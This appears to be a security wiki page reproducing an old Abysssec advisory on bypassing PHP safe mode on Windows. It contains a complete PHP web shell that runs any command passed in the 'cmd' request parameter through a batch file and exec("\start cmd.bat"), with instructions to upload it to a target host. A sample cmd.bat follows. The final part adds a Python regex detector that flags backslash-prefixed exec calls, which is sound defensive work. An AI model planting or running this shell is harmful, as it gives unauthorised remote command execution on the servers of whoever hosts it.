PHP <= 5.2.9 on Windows

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

{{#tabs}} {{#tab name="exploit.php"}}

```php
<?php
//cmd.php
/*
    Abysssec Inc Public Advisory

    Here is another safe mode bypass vulnerability that exists in PHP <= 5.2.9 on Windows.
    The problem comes from OS behavior: the implementation of, and interfacing between, PHP
    and the operating system's directory structure. The problem is that PHP won't tell the difference
    between directory browsing in Linux and Windows; this can give an attacker the ability
    to execute his/her commands on the target machine even with safe_mode On (php.ini setting).
    =============================================================================
    In Linux, when you want to open a directory, for example the PHP directory, you need
    to go to /usr/bin/php and you can't use \usr\bin\php. But Windows won't tell the
    difference between slash and backslash; it means there is no difference between
    c:\php and c:/php. This is not a vulnerability by itself, but because of this simple
    PHP implementation the "\" character can escape safe mode using a function like exec.
    Here is a PoC for the discussed vulnerability. Just upload the files on your target host and execute
    your commands.
    ==============================================================================
    Note: this vulnerability is just for educational purposes and the author will not be responsible
    for any damage caused by using this vulnerability.
    ==============================================================================
    For more information visit Abysssec.com
    Feel free to contact me at admin [at] abysssec.com
*/
    $cmd = $_REQUEST['cmd'];
    if ($cmd) {
        $batch = fopen("cmd.bat", "w");
        fwrite($batch, "$cmd>abysssec.txt" . "\r\n");
        fwrite($batch, "exit");
        fclose($batch);
        exec("\start cmd.bat");
        echo "<center>";
        echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
        echo "<textarea rows=20 cols=60>";
        require("abysssec.txt");
        echo "</textarea>";
        echo "</center>";
    }
?>

<html>
<body bgcolor="#000000" text="#D00000">
<center>
<form method=post>
<input type=text name=cmd >
<input type=submit value=bypass>
</form>
</center>
</body>
</html>
```

{{#endtab}}

{{#tab name="cmd.bat"}}

```
dir > abyss.txt
exit
```

{{#endtab}} {{#endtabs}}
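A defender-side check for the pattern the advisory describes, added here as an example that is not part of the original page or the Abysssec advisory: it scans PHP source for exec-style calls whose command literal begins with a backslash. The function name `find_backslash_exec_calls`, the functions covered beyond `exec`, and the sample input are assumptions constructed for illustration.

```python
import re

# Exec-style PHP functions to inspect. The advisory names only exec();
# the other three are an assumption added here for broader coverage.
EXEC_FUNCS = ("exec", "system", "passthru", "popen")

# Match func("...") or func('...') whose command literal starts with a
# backslash, as in the PoC's exec("\start cmd.bat").
LEADING_BACKSLASH_CALL = re.compile(
    r"\b(?P<func>" + "|".join(EXEC_FUNCS) + r")\s*\(\s*"
    r"(?P<quote>[\"'])(?P<arg>\\[^\"']*)(?P=quote)",
    re.IGNORECASE,
)


def find_backslash_exec_calls(php_source):
    """Return (line_number, function, argument) for each flagged call."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for m in LEADING_BACKSLASH_CALL.finditer(line):
            hits.append((lineno, m.group("func").lower(), m.group("arg")))
    return hits


# Constructed sample input; line 3 repeats the call from the page's PoC.
SAMPLE = r'''<?php
exec("dir", $out);
exec("\start cmd.bat");
system('C:\tools\report.exe');
PASSTHRU ( '\start job.bat' );
'''

if __name__ == "__main__":
    for lineno, func, arg in find_backslash_exec_calls(SAMPLE):
        print(f"line {lineno}: {func}() command starts with a backslash: {arg}")
```

A hit is a triage signal for code review on Windows hosts that still rely on safe mode, not proof of compromise; commands built from variables are not covered by this literal-only match.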